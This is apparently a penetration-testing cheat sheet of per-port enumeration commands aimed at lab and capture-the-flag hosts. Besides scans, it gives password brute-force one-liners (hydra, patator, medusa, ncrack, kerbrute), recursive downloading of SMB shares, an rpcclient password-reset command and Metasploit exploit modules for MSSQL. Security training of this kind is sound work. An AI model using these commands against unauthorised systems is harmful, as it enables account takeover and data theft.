02 Port Enumeration

Port 21 - FTP

1
nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.11.1.5
Copied!

Port 22 - SSH

try to login with default/simple account : admin:admin, root:root, user:password
Brute Force
1
BruteForce:
2
3
patator ssh_login host=10.11.1.5 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
4
hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.11.1.5
5
medusa -h 10.11.1.5 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
6
ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.11.1.5
Copied!

Port 25 - SMTP

1
nc -nvv 10.11.1.5 25
2
HELO foo<cr><lf>
3
4
telnet 10.11.1.5 25
5
VRFY root
Copied!
1
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.5
2
smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.5
Copied!

Port 53 - DNS

1
dnsrecon -d 10.10.10.192
Copied!

Port 88 - Kerberos

1
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" 10.11.1.5
Copied!
GitHub - TarlogicSecurity/kerbrute: An script to perform kerberos bruteforcing by using impacket
GitHub
1
python kerbrute.py -dc-ip 10.11.1.5 -users /root/document/ctf/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt
Copied!

Port 110 - Pop3

1
telnet 10.11.1.5
3
PASS abcd1234
4
5
or:
6
7
USER fkclai
8
PASS abcd1234
9
10
# List all emails
11
list
12
Copied!

Port 111 - Rpcbind

1
rpcinfo -p 10.11.1.5
2
rpcclient -U "" 10.11.1.5
3
#rpcclient gt;srvinfo
4
#rpcclient gt;enumdomusers
5
#rpcclient gt;querydominfo
6
#rpcclient gt;getdompwinfo //password policy
7
#rpcclient gt;netshareenum
8
#rpcclient gt;enumprivs
9
#rpcclient gt;setuserinfo2 <user id> 23 [email protected]
Copied!

Port 135 - MSRPC

1
nmap 10.11.1.5 --script=msrpc-enum
2
rpcdump.py 10.10.10.192 -p 135 >> /tmp/rpc.txt
Copied!

Port 139/445 - SMB

1
#Eumernation
2
smbmap -H 10.11.1.8
3
smbmap -u "guest" -p "" -H 10.11.1.31
4
nmap --script smb-enum-shares -p 139,445
5
enum4linux nest.htb
6
smbclient -L nest.htb
7
smbclient -U "r.thompson" -L \\\\10.10.10.182
8
smbclient -L //10.10.10.192 -N
9
10
# Check vulns
11
nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.8
12
nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.8
13
nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.8
14
nmap --script vuln -p 135,139,445 10.10.10.40
15
Copied!
1
smbmap -u TempUser -p welcome2019 -H nest.htb -R
2
smbclient \\\\nest.htb\\Data -U TempUser
3
smbclient //10.10.10.192/forensic -U audit2020 --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
4
mask ""
5
recurse ON
6
prompt OFF
7
mget *
8
Copied!

Port 389,636 LDAP

1
ldapsearch -h 10.11.1.8 -p 389 -x -b "dc=fkclai,dc=com"
2
ldapsearch -x -h 10.11.1.8 -D 'DOMAIN\fkclai' -w 'hash-password'
3
ldapdomaindump 10.11.1.8 -u 'DOMAIN\fkclai' -p 'hash-password'
4
5
windapsearch.py -d abcde.local --dc-ip 10.10.10.175 -U
6
https://github.com/ropnop/windapsearch
Copied!

Port 1433 MSSQL

1
nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.8
2
3
#MSF payload
4
use auxiliary/scanner/mssql/mssql_ping
5
use auxiliary/scanner/mssql/mssql_login
6
use exploit/windows/mssql/mssql_payload
Copied!
Last modified 11mo ago